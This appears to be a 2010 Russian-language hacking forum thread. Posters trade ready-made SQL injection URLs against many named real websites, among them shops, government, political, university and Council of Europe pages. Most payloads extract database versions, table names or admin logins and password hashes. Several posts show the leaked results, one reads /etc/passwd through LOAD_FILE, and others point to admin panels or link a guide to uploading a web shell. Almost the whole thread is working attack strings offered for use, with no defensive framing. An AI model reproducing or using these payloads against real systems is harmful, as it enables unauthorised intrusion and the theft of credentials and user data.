http://www.kprf-kaliningrad.ru/?id_n=-323+and+1=2+union+select+1,2,concat(0x3a,@@version ,user(),database(),@@version_compile_os),4,5+--&id=news
5.0.90-log u52083@10.8.0.97 u52083 portbld-freebsd7.2
http://www.fssmo.ru/CompDetails.aspx?id=111 or 1 group by concat((select concat(name,0x3a,passwd) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1
Code:
http://www.checkersindustrial.com/product.php?id=25+and+row(1,2)in(select+count(*),c oncat((select+table_name+from+information_schema.t ables+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+i nformation_schema.tables+x+group+by+a)
Code:
http://www.motorcyclebag.com/product.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11--
moodoone
22.10.2010, 22:21
Code:
http://ehrle.com.ua/products/products_cat2.php?p1=0&p2=-1+union+select+1,2,3,4,group_concat%28table_name%2 9,6,7+from+information_schema.tables--+
ТИЦ10.
http://www.anti-scam.org/cgi-bin/scamers-info/comments.cgi?view=-4389+union+select+1,concat_ws%280x3a,version%28%29 ,user%28%29%29,3,4,5,6+--+
4.1.22-lk-log:antiscam@localhost
http://www.boomtowndesign.com/portfolio-project.php?id=56 union select version(),2-- 1
http://www.solardesign.com/projects/project_display.php?id=1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1-- 1
http://www.meinhardtgroup.com/keypeople.php?id=-228 union select 1,unhex(hex(concat(user,0x3a,password))),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28 from mysql.user limit 0,1-- 1
http://www.dallaswebdeveloper.com/pages/portfolio.php?id=graphic' limit 0 /*!union*/ select 1,2,3,/*!table_name*/,5 from information_schema.`tables` limit 17,1-- 1
Недвижимость Украины
http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,password,email,sitename),5,6,7,8,9+from+users--&cat=19
5.1.49 keystonecomua@localhost keystonekatalog portbld-freebsd8.0
http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,password,email,sitename),5,6,7,8,9+from+users--&cat=19
магазины (Испания)
http://www.almonedavigo.com/tienda.php?id=-44+union+select+concat_ws(0x3a,version(),user(),da tabase())+--+&tit=Coleccionables%20en%20papel
http://www.motorrad.es/tiendas/tienda.php?id=-3+union+select+1,clave+from+motor_bbdd.usuarios+--+
http://www.recicleta.com/html/tienda.php?tipo=bicicletas&id=-12+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42+--+
http://www.kdekovito.com/tienda.php?id=-9+union+select+1,2,concat_ws(0x3a,Userusuario,pass Usuario),4,5,6+from+usuarios_panel+--+
http://www.naturabisse.es/en/tienda.php?id=-335+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),user(),database()),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 %20,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54+--++--+
http://www.coleccionarsellos.com/tienda/tienda.php?id=-112+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9+--+
http://www.elbauldelplacer.com/tienda.php?mod=tienda_productos&id=-50+union+select+1,concat_ws(0x3a,nombre,password), 3,4,user()+from+usuarios+--+
http://www.motocross.es/tienda.php?id=-24+union+select+concat_ws(0x3a,nickname,password)+ from+usuarios+--+
http://www.artcorporal.es/web/tienda.php?id=1&id_subcategoria=-1+union+select+1,concat_ws(0x3a,User_login,user_pa ss),3,4,5,6,7,8,9,10+from+wp_users+--+
http://www.hectorgomis.com/tienda.php?id=8&pag=9&sub=-13+union+select+1,pass,3+from+usuarios+--+
http://lacacharreriadekuentin.com/tienda.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase())+--+
http://www.1000bebes.com/tienda.php?mod=producto&iu=-1444+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7,8,9,10,11,12,13,14,15,16,1 7+--+
http://www.ccriberadelxuquer.com/tienda.php?id=-93+union+select+1,2,concat_ws(0x3a,nombre,passwd), 4,5,6,7,8,9,10,11+from+manilva.usuarios+--+
http://www.foronum.com/links-ficha-tienda.php?id=-61+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13+--+
http://www.estudiocanfranc.com/carritocompra/tienda.php?val=1&id=-56++union+select+1,2,3,4444,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19+--+
http://www.powderchile.cl/tienda.php?funcion=ver_categoria&id=-8+union+select+concat_ws(0x3a,login,pass)+from+adm inistrador+--+
http://cyberpunks.es/spar/tienda.php?id=-10+union+select+1,2,concat_ws(0x3a,user,pass),4,5, 6,7,8,9,10,11,12,13+from+ad1690.usuarios+--+
ЛДПР новосибирск
http://www.ldpr-nsk.ru/?tpage=snews&year=2010&mounth=10&day=-19+and+1=2+union+select+1,2,3,4,concat(@@version,0 x20,user(),0x20,database(),0x20,@@version_compile_ os)+--
5.1.50-log ldpr-nsk@localhost ldprnsk_ldpr redhat-linux-gnu
http://citidesk.ru/browse_classifieds.php?classifiedcat_id=160+or+(se lect+count(*)from(select+1+union+select+2+union+se lect+3)x+group+by+concat(mid((select+TABLE_NAME+fr om+information_schema.tables+where(table_schema!=0 x696E666F726D6174696F6E5F736368656D61)limit+0,1),1 ,64),floor(rand(0)*2)))
ТИЦ : 20
4k
PHP:
http://dialogkyiv.com.ua/index.php?id=5&show=4nalbum&do=showpic&pid=-42+union+select+user_website+from+inform_users+whe %20%20re+user_website+LIKE+0x2575626225+LIMIT+0,1--+
http://www.ntc.com.tr/resim.php?id=17&katid=2%20and(select%201%20from(select%20count(*), concat((select%20(select%20concat(0x7e,0x27,unhex( hex(database())),0x27,0x7e))%20from%20information_ schema.tables%20limit%200,1),floor(rand(0)*2))x%20 from%20information_schema.tables%20group%20by%20x) a)%20and%201=1
http://www.biyikoglutesisleri.com/resim.php?id=17&katid=2%20and(select%201%20from(select%20count(*), concat((select%20(select%20concat(0x7e,0x27,unhex( hex(database())),0x27,0x7e))%20from%20information_ schema.tables%20limit%200,1),floor(rand(0)*2))x%20 from%20information_schema.tables%20group%20by%20x) a)%20and%201=1
http://www.brassjunkies.com/auction_details.php?auction_id=100131+or+1+group+b y+concat(version(),floor(rand(0)*2))having+min(0)+ or+1--+
http://www.yeu-international.org/nm/3/article.php?id=40+union+select+1,2,3,4,5,6,7,8,9--
http://www.warrandale.com/portfolio-details.php?id=-43 union select 1,2,concat(user,0x3a,password),4,5,6,7 from administrators-- 1&c=prtf
DezMond™
25.10.2010, 21:44
Мини сборочка)
ricklemay.com тИЦ — 10 PR — 3
Code:
http://www.ricklemay.com/index.php?id=10&uid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+from+users+--+
valeri.ru
Code:
http://www.valeri.ru/index.php?action=types&id=8&uid=-383+union+select+1,password,3,4,5,6,7,8,9,10,11+fr om+users+--+
www.uidjournal.com тИЦ — 10 PR — 4
Code:
http://www.uidjournal.com/index.php?page=solutionsguide&provider=-4'+union+select+1,2,concat_ws(0x3a3a,email,passwor d),4,5,6,7,8,9,10,11,12,13,14+from+users+--+
marquardt-switches.com тИЦ — 10 PR — 3
Code:
http://www.marquardt-switches.com/232.html?&L=1&tx_productkatalog_pi1%5Bmode%5D=detail2&tx_productkatalog_pi1%5Bmodifier%5D=0&tx_productkatalog_pi1%5Bvalue%5D=1810&tx_productkatalog_pi1%5Bpointer%5D=2&cHash=e51d8d4c7b&home=toggle-switches.html&prodID=-6044+union+select+1,2,3,4,5,6+--+
asatpo.com
Code:
http://www.asatpo.com/normativa/ver_normativa.php?n=-6'+union+select+1,group_concat(table_name),3+from+ information_schema.tables+--+
opp.ca тИЦ — 10 PR — 7
Code:
http://www.opp.ca/ecms/index.php?id=405&nid=61+union+select+1,2,3,4,password,6+from+users+--+
hessenweb.de тИЦ — 10 PR — 4
Code:
http://www.hessenweb.de/index.php?id=veranstaltungen&no_cache=1&tx_jwcalendar_pi1[uid]=698&tx_jwcalendar_pi1[time]=1264978800+UNion+SElect+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65+--+&tx_jwcalendar_pi1[view]=LIST&cHash=4b5ebde116
lindy-hop.ch тИЦ — 10 PR — 3
Code:
http://lindy-hop.ch/cms/index.php?id=10&tx_jwcalendar_pi1%5Bview%5D=LIST&tx_jwcalendar_pi1%5Buid%5D=11&tx_jwcalendar_pi1%5Btime%5D=-1272664800+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65+from+be_users+--+&cHash=14d7bf51d0
bikezona.tv тИЦ — 10 PR — 4
Code:
http://www.bikezona.tv/videomaton/index.php?idvideo=-407'+union+select+1,2,concat_Ws(0x3a3a,login,passw ord),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+bztv _usuarios+--+
mapeco.fr
Code:
http://www.mapeco.fr/index.php?host=ccih&l=1&id=-247600596+union+select+111+--+&cmd=zoom&op=locate&module=epci&etape=3&mode=&val=&niv=-1&XMIN=423000&YMIN=2489500&XMAX=489000&YMAX=2529500&XMINEXTENT=423000&YMINEXTENT=2489500&XMAXEXTENT=489000&YMAXEXTENT=2529500&info=5&cible=&cx=206&cy=236
corematerials.3acomposites.com
Code:
http://www.corematerials.3acomposites.com/316.html?&no_cache=1&L=1&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cou&tx_nicosdirectory_pi1%5Bvalue%5D=-23_1+UNion+Select+user(),222,database(),444+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=00cdf0441c
malighting.com тИЦ — 20 PR — 4
Code:
http://www.malighting.com/control.html?&tx_lightpowerpdb_pi1[parent_gruppe]=233'&tx_lightpowerpdb_pi1[produkt_id]=-2649+union+select+1,2,concat_Ws(0x3a3a,admin_login ,admin_password),4,5,6,7,8,9+from+pdb_admin+--+&cHash=80a870b15e'
corporate.lanxess.com тИЦ — 40 PR — 6
Code:
http://corporate.lanxess.com/index.php?id=289&L=0&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-16717+UNion+SElect+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,LOAD_FILE(0x 2F6574632F706173737764),78+--+&tx_editfiltersystem_pi1%5Bnews_category%5D=34'&tx_editfiltersystem_pi1%5Bnews_date_start%5D=9.200 9'&tx_editfiltersystem_pi1%5Bnews_date_end%5D=9.2010'
fs-eprocure.com
Code:
http://www.fs-eprocure.com/index.php?id=131&no_cache=1&L=1%2F&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-1054+UNioN+sELecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56+--+&cHash=24d6156e85f25dc6d07cf6d6fcbc2052
ferrostaalpower.com
Code:
http://ferrostaalpower.com/index.php?id=131&no_cache=1&L=5&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-1259+UnioN+SelecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56+from+information_schema .tables+--+&cHash=9170bd1cf7
couplemeets.de
Code:
http://www.couplemeets.de/dev/index.php?id=26&tx_nicosdirectory_pi1%5Bmode%5D=detail&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,concat_ws(0x3a3a,username,password,admin), 19,20,21+from+be_users+limit+1,1+--+&cHash=81f10fc595
foodtrendexperience.com
Code:
http://www.foodtrendexperience.com/fte/index.php?idVideo=-15+union+select+1,2,user(),4,5,6,7,8,9,10,11,12+--+
darinfo.com.ua тИЦ — 10 PR — 1
Code:
http://www.darinfo.com.ua/inter/index.php?action=base&id=5&location=1&uid=-728'+union+select+1,2,3,4,5,6,7,8,9,version()+--+
gruenberg.de тИЦ — 10 PR — 4
Code:
http://www.gruenberg.de/index.php?sp=de&nr=-17+union+select+1,user(),3,4,5,6+from+information_ schema.tables+--+&uid=d_bilder/&id=showbild&alt=%26id%3Dtour%26uid%3D%26uuid%3D
allhometeens.com
Code:
http://www.allhometeens.com/?page=inner&id_article=-43'+union+select+1,user(),3,4,5,6,7,8+--+
foruminst.sk тИЦ — 10 PR — 5
Code:
http://www.foruminst.sk/index.php?p=publications&t=a&xp=&publ_id=408'&link=publ/egyeb/mezeiang/urbandevelopment,,&MId=&Lev=&Ind=-1+union+select+1,2,concat_ws(0x3a3a,email,usname,u spasswd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+fr om+users+--+&P=index,en,
stfw.ch тИЦ — 10 PR — 5
Code:
http://www.stfw.ch/no_cache/stfw/portrait/schulleitung/?tx_spdirectory_pi1%5Bmode%5D=detail&tx_spdirectory_pi1%5Bvalue%5D=-90+/**/+UNioN+/**/+/**/+SelECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,user(),42,43,44+--+
soziologie.de тИЦ — 10 PR — 7
Code:
http://www.soziologie.de/index.php?id=4&tx_jwcalendar_pi1%5Btime%5D=-3600+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,group_concat(table_name),21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65+from+information_schema. tables+--+&tx_jwcalendar_pi1%5Buid%5D=81&tx_jwcalendar_pi1%5Bview%5D=MONTH&cHash=ba2015f647
ricerca.polimi.it тИЦ — 10 PR — 5
Code:
http://www.ricerca.polimi.it/index.php?id=4425&tx_wfqbe_pi1%5Bid%5D=25560+union+select+1,2,user() ,4,5,6,7,8,9,10+from+information_schema.tables+--+
blv-sport.de тИЦ — 10 PR — 4
Code:
http://blv-sport.de/index.php?id=232&tx_wfqbe_pi1%5Buid%5D=-442+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,1 3+from+laufsport+--+
architector.dp.ua тИЦ — 40 PR — 2
Code:
http://www.architector.dp.ua/?catalog&dep=study&arts=6&id=-36'+union+select+1,2,3,concat_ws(0x3a3a,login,pass w),5,6,7,8,9,10,11,12,13+from+admin_users+--+
photographysalley-gallery.com тИЦ — 10 PR — 3
Code:
http://photographysalley-gallery.com/index.php?com=evenement&idevent=-1'+union+select+1,2,3,4,5,6,7,8+from+information_s chema.tables+--+
carronlugon.com тИЦ — 10 PR — 2
Code:
http://www.carronlugon.com/index.php?mod=galerie&idevent=-15+union+select+1,2,concat_Ws(0x3a3a,login,psw,nom ,privilege),4+from+utilisateur+--+
aflakshop.com
Code:
http://aflakshop.com/cat.php?id=-1'+union+select+1,2,3,4,table_name,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+i nformation_schema.tables+--+&page=50&AdsID=1586&ads_type=&percent=
readingmatrix.com тИЦ — 10 PR — 5
Code:
http://www.readingmatrix.com/ecalendar/index.php?action=details&event_id=-80+union+select+1,2,3,4,5,user(),7,8,9,10,11,12+--+
robot-ch.org тИЦ — 10 PR — 6
Code:
http://www.robot-ch.org/site/modules/piCal/index.php?com_mode=nest&com_order=0&event_id=-161'+union+select+1,2,3,concat_ws(0x3a3a,login,pas s),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+users+limit+1 ,1+--+
media-watch.tv тИЦ — 10 PR — 3
Code:
http://media-watch.tv/e_event_form.php?event_id=85+union+select+1,2,3,4, concat_Ws(0x3a3a,user_name,password),6,7,8,9,10,11 +from+user+limit+1,1+--+&ref_page=/index.php
bistum-dresden-meissen.de тИЦ — 10 PR — 5
Code:
http://www.bistum-dresden-meissen.de/front_content.php?idcat=2110'&idart=11842'&id=-457+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25+--+&st=1
babochka-style.ru
Code:
http://babochka-style.ru/index.php?&act=shop&action=showitem&id=-31'+union+select+1,2,3,concat_ws(0x3a3a,login,pass word),5,6+from+users+--+
drift.s-w-s.ru
Code:
http://drift.s-w-s.ru/index.php?&act=shop&action=showitem&id=-8'+union+select+1,2,3,concat_ws(0x3a3a,login,passw ord),5,6,7,8,9,10,11+from+users+limit+1,1+--+
firestreamvault.com тИЦ — 10 PR — 1
Code:
http://firestreamvault.com/main/index.php?go=front/index.php&go=showitem&cat_id=580&narrow=&item_id=-1434+union+select+1,2,3,4,group_concat(table_name) ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+inf ormation_schema.tables+--+&user_id=
ПС баянов НЕТ!
какбэ отакэ
HTML:
http://specavia.com.ua/l/ru/pages/120&mod=news&news=-1+union+select+1,concat(name,0x7c,pass,0x7c,id,0x3 c62723e),3,4+from+specavia.users+--+
HTML:
http://www.slavrada.gov.ua/?view=votes&voteID=-1+union+select+1,2,3,4,5,6,7,username,user_passwor d,user_form_salt,11,12,13,14,15+from+phpbb3_users+--+
http://el-ero.ru/aboutthisgood.php?ID=1603+or+1+group+by+concat((se lect+version()),rand(0)|0)+having+min(0)
http://www.serovmet.ru/ru/press/news/index.php?id15=-9373+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a ,version(),@@version_compile_os,user(),database()) ,10,11,12,13,14,15,16,17,18+--+
http://autoperspect.ru/index.php?all_news&details=-156+union+select+1,2,concat_ws(0x3a3a,version(),@@ version_compile_os,user(),database()),4,5,6,7,8,9, 10,11+--+
http://iranembassy.ru/?section=news&page=article&view=article&id=-479+union+select+1,2,3,concat_ws(0x3a3a,version(), @@version_compile_os,user(),database()),5,6,7,8,9, 10,11,12,13,14+--+
http://superrest.ru/town_info.php?id=-132+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13,14+--+
http://www.ucentrec.ru/seminars/seminar/?info_id=-323+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,concat_ws(0x3a3a,@@version_compile_os,user(),dat abase())+--+
bloodAngel
27.10.2010, 01:53
http://bitpartner.com.ua/office/register.php?sid=2+union+select+1,2,3,4,5,6,7,8,9, 10,concat_ws(0x3,version(),user(),database()),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35--
[Feldmarschall]
27.10.2010, 04:44
EU
http://www.coe.int/COEfavicon.ico Совет Европы (Council of Europe)
_________________________________________________
http://www.coe.int/t/congress/sessions/19/NewsSearch/default_en.asp?p=nwz&id=6586+OR(1=(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES for xml raw))&lmLangue=1
MSSQL version:
Microsoft SQL Server 2008 (SP1) - 10.0.2723.0 (Intel X86) Jul 10 2009 01:41:08 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1)
тИЦ — 2200
PR — 9
dunravenhouse.com
PR - 2
Code:
https://www.dunravenhouse.com/cart/index.php?cat_id=-86+union+select+concat_ws(0x3,version(),user(),dat abase()),2,3,4,5,6,7,8--
staceyspans.com
PR - 2
Code:
http://www.staceyspans.com/cart/index.php?cat_id=-5+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5,6,7,8--
cellgroup.com
PR - 3
Code:
http://www.cellgroup.com/estore/index.php?cat_id=-11+union+select+concat_ws(0x3,version(),user(),dat abase()),2,3,4,5,6,7,8--
marketitdirect.net
PR - 1
Code:
http://www.marketitdirect.net/shop/index.php?cat_id=-3+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5,6,7,8--
rockpaidat.com
PR - 3
Code:
http://www.rockpaidat.com/shop/index.php?cat_id=-23+union+select+concat_ws(0x3,version(),user(),dat abase()),2,3,4,5,6,7,8--
marshwoodgardens.co.nz
PR - 4
Code:
http://www.marshwoodgardens.co.nz/index.php?cat_id=-1+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5,6,7,8--
vandongens.com
PR - 2
Code:
http://www.vandongens.com/catalogue/index.php?cat_id=-244+union+select+concat_ws(0x3,version(),user(),da tabase()),2,3,4,5,6,7,8--
-PRIVAT-
27.10.2010, 14:41
http://www.trenco.biz/news/?news_id=14%20union%20select%201,2,3,4,5,6,7,8,9,1 0,11--
http://www.avmaniacs.com/review.php?id=-1472/**/union/**/select/**/1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8--
http://www.freediving.biz/news/index.php?news_id=19%20union%20select%201,2,3,4,5, 6--
http://autosfera.biz/news.php?news_id=91/**/union/**/select/**/1,2,3,4,5--
http://www.inbar.int/show.asp?NewsID=373 or 1=@@version--
+Дополнение к FeldMarshall
рыбаловная база "УДАЧА"
Code:
http://www.udacha-volga.ru/index.php?page=1&newsid=-95+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@ver sion,user(),database(),@@version_compile_os),5+--
4.1.25-log udachavo@fe15.hc.ru wwwudachavolgaru portbld-freebsd6.2
Code:
http://www.udacha-volga.ru/index.php?page=1&newsid=-95+and+1=2+union+select+1,2,3,concat_ws(0x3a,login ,email,pswd),5+from+administrator--&PHPSESSID=d788d79d683a509f9a86cf2284e5febc
http://www.udacha-volga.ru/admin.php
пассы не подходят
Strilo4ka
27.10.2010, 23:30
pr7 тиц40
http://www.lib.udel.edu/ej/index.php?S=%' and 0 union select 1,unhex(hex(version())),3,4,5,6,7 from mysql.user/* &I=26
veterans-gaming.com
PR - 1
Code:
http://www.veterans-gaming.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
globalassaultunit.net
PR - 1
Code:
http://globalassaultunit.net/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
www.clankillas.net
PR - 3
Code:
http://www.clankillas.net/portal/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
totalgamersnetwork.com
PR - 1
Code:
http://www.totalgamersnetwork.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
hu.cring.eu
PR - 1
Code:
http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12--
Примерно так выдираем хеш и никнейм админа:
Code:
http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3a,user_name,us er_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_ user--
Админка:
Code:
http://hu.cring.eu/e107_admin/admin.php
как залить шелл (https://antichat.live/showpost.php/p/2119209/postcount/63/)
http://www.shopland-n.com/town_info.php?id=-149+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4,5,6,7+--+
http://www.appliedartsmag.com/opinions.php?id=-37+union+select+1,concat_ws(0x3a3a,version(),@@ver sion_compile_os,user(),database()),3,4,5
http://www.creativeniche.ca/candidate_jobs_detail.cfm?jobid=-1304+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a ,version(),user(),database()),10,11
http://www.thunderbirdmarine.com/email-friend.php?ID=-2987+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,ID,username,password),11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69, 70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86 ,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,10 2,103,104,105,106,107,108,109,110+from+Users+limit +0,1
Онлаин магазин.
PHP:
http://www.historicalcenter.ru/etc.php?id=6&idg=420+union+select+1,concat_WS(0x3a,user(),versi on(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22/*
PHP:
histcenter@localhost:5.0.45:histcenter
Салон красоты да ляпоты =)
PHP:
http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_ws(0x3 a,user(),version(),database()),5,6,7,8,9,10/*
PHP:
admin_vashstile@localhost:5.0.22-log:admin_vashstile
Продолжаем копать получаем
PHP:
http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_WS(0x3 a,id,username,uncrypt_pass,email,status),5,6,7,8,9 ,10+from+users+limit+0,1/*
админка тут
PHP:
http://www.vashstile.ru/admin/
правда акк админа я так и не нашел
http://www.elves.ru/image/1_2.gif
http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,@@ve rsion,user(),database(),@@version_compile_os),6,7, 8,9,10,11,12,13,14+--
4.0.26-log Uwww64S@localhost udb64 portbld-freebsd4.10
http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,logi n,pass,email),6,7,8,9,10,11,12,13,14+from+client+l imit+1+offset+495--
http://www.magelan.su/news.php?id=1075'+and+1=0+union+select+1,2,group_c oncat(table_name),4,5,6+from+information_schema.ta bles+Where+table_schema='magelan_base'+--+
ТИЦ : 230
http://www.degreeart.com/newsite/viewpress.php?id=104 union select 1,version(),3,4,5,6-- 1
http://www.farcountrypress.com/details.php?id=214' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77-- 1
http://eurocatwalk.com/photo_details.php?uid=-428 union select 1,2,3,4,5,version(),7,8,9,10-- 1
http://www.gamedogped.com/details.php?id=48212 or 1 group by concat((select concat(username,0x3a,password) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1
http://www.gamepile.com/details.php?id=-21 /*!Union*/ select 1,2,table_name,4,5,6,7,8 from information_schema.`tables`-- 1
tidewaterintergroup.org
PR - 5
Code:
http://www.tidewaterintergroup.org/e107_plugins/aa_meetings/directory.php?Day_qf=d0s&City_qf=%2522+union+select+null,null,null,concat_w s(0x3a,user_loginname,user_password),null,null,nul l,null,null,null,null,null,null,null,null,null+fro m+e107_user+where+user_id=1--+
Code:
http://www.tidewaterintergroup.org/e107_admin/admin.php
wildcatsclan.net
PR - 1
Code:
http://www.wildcatsclan.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%20 1,2,3,4,5,concat_ws(0x3a,user_loginname,user_passw ord),7,8,9,10%20from%20e107_user%20where%20user_ad min=1%20limit%200,1
Code:
http://www.wildcatsclan.net/e107_admin/admin.php
vancouverphoto.net
PR - 1
Code:
http://www.vancouverphoto.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%20 1,2,3,4,5,concat_ws(0x3a,user_loginname,user_passw ord),7,8,9,10%20from%20e107_user%20where%20user_ad min=1%20limit%200,1
Code:
http://www.vancouverphoto.net/e107_admin/admin.php
-PRIVAT-
28.10.2010, 20:24
http://www.ramzes.biz/article.php?id=-69%20union%20select%201,concat_ws(0x3a,user_name,u ser_password),3,4,5,6,7,8%20from%20cpg11d_users--
http://businesstuning.biz/article.php?id=1/**/union/**/select/**/1,2,3,4
http://www.ethr.biz/article.php?id=-58%20union%20select%201,concat_ws(0x3a,id,username ,password),3,4,5,6,7%20from%20member--
http://www.clicknews.biz/article.php?id=115400%20or%201%20group%20by%20conc at(version(),floor(rand(0)*2))having%20min(0)%20or %201--%201
http://www.michaelandersen.biz/news/nw/article.php?id=-159%20union%20select%201,2,version(),4,5,6,7,8,9,0 ,1,2,3--
http://whisperstreet.biz/news.php?id=13'%20or%201%20group%20by%20concat(ver sion(),floor(rand(0)*2))having%20min(0)%20or%201--%201
http://www.marinaonthebay.biz/news.php?id=-25%20union%20select%201,2,3,concat_ws(0x3a,id,logi n,password),5,6,7,8,9,10,11%20from%20administrator s--
http://turkkulturvakfi.biz/pages.php?ID=-31%20union%20select%201--
